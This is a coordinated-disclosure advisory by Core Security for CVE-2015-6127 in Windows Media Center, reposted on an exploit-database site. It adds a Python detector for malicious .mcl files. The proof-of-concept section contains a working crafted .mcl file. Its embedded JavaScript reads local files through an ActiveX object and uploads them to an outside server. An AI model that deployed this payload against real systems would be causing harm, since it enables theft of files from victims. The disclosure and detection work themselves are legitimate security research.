0day Today Exploits Market and 0day Exploits Database

Microsoft Windows Media Center Link File Incorrectly Resolved Reference Exploit

Author: Core Security
Risk: Security Risk High
0day-ID: 0day-ID-24691
Category: remote exploits
Date added: 09-12-2015
CVE: CVE-2015-6127
Platform: windows
1. Advisory Information
 
Title: Microsoft Windows Media Center link file incorrectly resolved reference
Vendors contacted: Microsoft
Release mode: Coordinated release
 
2. Vulnerability Information
 
Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127
 
3. Vulnerability Description
 
The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.
 
A specially crafted MCL file whose 'url' parameter points to the MCL file itself can trick Windows Media Center into rendering that same MCL file as a local HTML file within the Media Center's embedded web browser.
 
4. Vulnerable Packages
 
Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.
 
5. Vendor Information, Solutions and Workarounds
 
Microsoft posted the following Security Bulletin: MS15-134 [2]
 
6. Credits
 
This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.
 
7. Technical Description / Proof of Concept Code
 
The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the Local Machine zone, but it does not opt in to the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature. An attacker can therefore leverage this to read and exfiltrate arbitrary files from a victim's local filesystem by convincing the victim to open a malicious MCL file.
 
The proof of concept is an MCL file with embedded HTML + JS code that references itself in the 'url' parameter. Unlike what happens when a local HTML file is loaded into Internet Explorer 11, the JS code included here runs automatically with no prompts, and it is able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. The files read this way can then be uploaded to an arbitrary remote web server.
 
Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.
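As an added defender-side example (not part of the Core Security advisory or Microsoft's code): a small Python triage routine that flags .mcl files whose 'url' attribute refers back to an .mcl file or a local path, or whose body embeds script. The MCL samples are constructed, and the attribute syntax it parses is assumed from the advisory's PoC rather than from a Microsoft specification.

```python
"""Added triage helper for Windows Media Center .mcl files (CVE-2015-6127).

Flags the pattern the advisory describes: an <application> tag whose 'url'
attribute points back at an .mcl file (or a local path), so the MCL file is
rendered as local HTML, plus any embedded script. Regex-based on purpose:
MCL files are not guaranteed to be well-formed XML. Assumption: the
attribute syntax is as shown in the advisory's PoC.
"""
import re

APP_TAG = re.compile(r"<application\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*(["'])(.*?)\2""", re.DOTALL)
SCRIPT = re.compile(r"<script\b|ActiveXObject\s*\(", re.IGNORECASE)
LOCAL_PATH = re.compile(r"^(file:|[a-z]:[\\/]|\\\\)", re.IGNORECASE)


def parse_application_attrs(text):
    """Return the attributes of the first <application ...> tag, keys lower-cased."""
    m = APP_TAG.search(text)
    if not m:
        return {}
    return {name.lower(): value for name, _quote, value in ATTR.findall(m.group(1))}


def analyze_mcl(text, filename):
    """Return a list of findings for one MCL file's text and its own file name."""
    findings = []
    url = parse_application_attrs(text).get("url", "").strip()
    if url:
        # Last path component, with any query string and either slash style removed.
        target = url.split("?", 1)[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if target == filename.lower():
            findings.append("url references the MCL file itself (self-rendering as local HTML)")
        elif target.endswith(".mcl"):
            findings.append("url references another .mcl file")
        if LOCAL_PATH.match(url):
            findings.append("url points at a local path")
    if SCRIPT.search(text):
        findings.append("MCL body embeds script")
    return findings


# Constructed samples (not real files): a self-referencing MCL with script,
# and a plain launcher MCL that only uses the 'run' parameter.
SAMPLES = {
    "self_reference": '<application url="evil.mcl"\nname="Showcase">\n<html><body>'
                      '<script>new ActiveXObject("MSXML2.XMLHTTP");</script>'
                      '</body></html></application>',
    "launcher": '<application run="%SystemRoot%\\ehome\\ehshell.exe" name="TV" />',
}


def triage_samples():
    """Run the detector over the constructed samples, keyed by sample name."""
    names = {"self_reference": "evil.mcl", "launcher": "tv.mcl"}
    return {n: analyze_mcl(t, names[n]) for n, t in SAMPLES.items()}
```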
 
7.1. Proof of Concept
 
A new file should be created with the name "poc-microsoft.mcl" and with the following content:
 
  
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">
 
    function do_upload(fname, data){
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
        xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
        xmlhttp.setRequestHeader("Connection", "close");
        xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
        xmlhttp.send(new Uint8Array(data));
    }
 
 
    function read_local_file(filename){
        /* Must use this one, XMLHttpRequest() doesn't allow to read local files */
        var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlhttp.open("GET", filename, false);
        xmlhttp.send();
        return xmlhttp.responseBody.toArray();
    }
 
 
    function upload_file(filename){
        try{
            do_upload(filename, read_local_file(filename));
        }catch(e){
            alert(filename + " error: " + e);
        }
    }
 
 
    upload_file("file:///C:/Windows/System32/calc.exe");
 
</script>
</body>
</html>
 
</application>
 
8. Report Timeline
 
2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft opened case MSRC 31305 for the report.
2015-10-02: Core Security asked Microsoft for a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine whether they would address it in a security release.
2015-10-07: Core Security asked Microsoft to let them know once a decision had been made.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft whether they had determined a release date for the fix and a CVE ID for the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they had assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that the advisory would be published on Tuesday, December 8, 2015.
2015-11-12: Microsoft asked Core Security for the link where the advisory would be published and the name of the researcher to appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.
